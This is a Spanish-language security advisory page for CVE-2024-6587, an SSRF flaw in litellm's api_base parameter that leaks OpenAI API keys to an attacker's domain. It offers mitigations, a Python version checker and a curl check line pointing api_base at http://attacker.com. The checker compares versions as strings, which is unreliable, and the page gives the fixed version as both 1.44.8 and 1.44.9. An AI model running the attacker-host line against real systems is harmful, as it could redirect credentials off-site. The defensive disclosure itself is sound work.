Plataforma
python
Componente
litellm
Corregido en
1.44.9
1.44.8
Se ha identificado una vulnerabilidad de Server-Side Request Forgery (SSRF) en la biblioteca litellm, afectando a versiones anteriores o iguales a 1.9.dev0. Esta falla permite a un atacante manipular el parámetro api_base en las solicitudes POST /chat/completions, lo que resulta en el envío de solicitudes a un dominio controlado por el atacante, incluyendo la clave API de OpenAI. La versión 1.44.8 corrige esta vulnerabilidad.
La explotación exitosa de esta vulnerabilidad SSRF permite a un atacante interceptar la clave API de OpenAI. Al especificar un api_base malicioso, el servidor enviará solicitudes a un dominio controlado por el atacante, incluyendo la clave API. Esto podría resultar en el acceso no autorizado a los recursos de OpenAI, el uso indebido de la API, y potencialmente, el robo de datos sensibles asociados a la cuenta de OpenAI. El impacto se amplifica si la clave API tiene permisos amplios o acceso a información confidencial. Esta vulnerabilidad es similar a otros ataques SSRF donde la manipulación de URLs puede llevar a la exposición de información sensible o el acceso a recursos internos.
Esta vulnerabilidad fue publicada el 13 de septiembre de 2024. No se ha reportado su inclusión en el KEV de CISA ni la existencia de exploits públicos activos al momento de la publicación. Sin embargo, dada la naturaleza de SSRF y la disponibilidad de la clave API, existe una probabilidad moderada de que sea explotada en el futuro. Se recomienda monitorear las fuentes de inteligencia de amenazas para detectar cualquier actividad sospechosa.
Applications utilizing the berriai/litellm library, particularly those integrated with OpenAI services, are at risk. Environments where the api_base parameter is not properly validated or sanitized are especially vulnerable. Shared hosting environments where multiple users might interact with the litellm application are also at increased risk.
• python / library:
import os
import subprocess
def check_litellm_version():
try:
result = subprocess.check_output(['pip', 'show', 'litellm'], stderr=subprocess.STDOUT, text=True)
version_line = [line for line in result.splitlines() if 'Version:' in line]
if version_line:
version = version_line[0].split(': ')[1].strip()
if version <= '1.9.dev0':
print(f"[!] litellm version {version} is vulnerable to CVE-2024-6587. Upgrade to 1.44.8 or later.")
else:
print("[+] litellm version is not vulnerable.")
else:
print("[!] Could not determine litellm version.")
except FileNotFoundError:
print("[!] litellm is not installed.")
check_litellm_version()• generic web:
curl -I 'http://your-litellm-app/chat/completions?api_base=http://attacker.com' | grep api_basedisclosure
patch
Estado del Exploit
EPSS
88.37% (99% percentil)
CISA SSVC
Vector CVSS
La mitigación principal es actualizar a la versión 1.44.8 de litellm, que incluye la corrección para esta vulnerabilidad. Si la actualización no es inmediatamente posible, se recomienda implementar medidas de seguridad adicionales. Restrinja el acceso al endpoint /chat/completions a fuentes confiables. Implemente validación y saneamiento riguroso del parámetro apibase para evitar la inyección de URLs maliciosas. Considere el uso de un Web Application Firewall (WAF) para filtrar solicitudes sospechosas. Monitoree los logs del servidor en busca de patrones inusuales de solicitudes que involucren el parámetro apibase.
Actualice la biblioteca litellm a la versión 1.44.9 o superior. Esto corrige la vulnerabilidad SSRF que permite a usuarios maliciosos interceptar la clave de la API de OpenAI. Ejecute `pip install --upgrade litellm` para actualizar a la última versión.
Análisis de vulnerabilidades y alertas críticas directamente en tu correo.
CVE-2024-6587 es una vulnerabilidad de Server-Side Request Forgery (SSRF) en la biblioteca litellm, que permite a atacantes interceptar la clave API de OpenAI.
Si está utilizando litellm en una versión anterior o igual a 1.9.dev0, es vulnerable a esta SSRF. Actualice a la versión 1.44.8 para mitigar el riesgo.
La solución es actualizar a la versión 1.44.8 de litellm. Si no puede actualizar inmediatamente, implemente medidas de mitigación como la validación del parámetro api_base.
No se han reportado exploits activos al momento de la publicación, pero existe una probabilidad moderada de que sea explotada en el futuro.
Consulte el repositorio de litellm en GitHub o la documentación oficial para obtener información actualizada sobre esta vulnerabilidad.
Sube tu archivo de dependencias y detecta esta y otras CVEs al instante.
Sube tu archivo requirements.txt y te decimos al instante si estás afectado.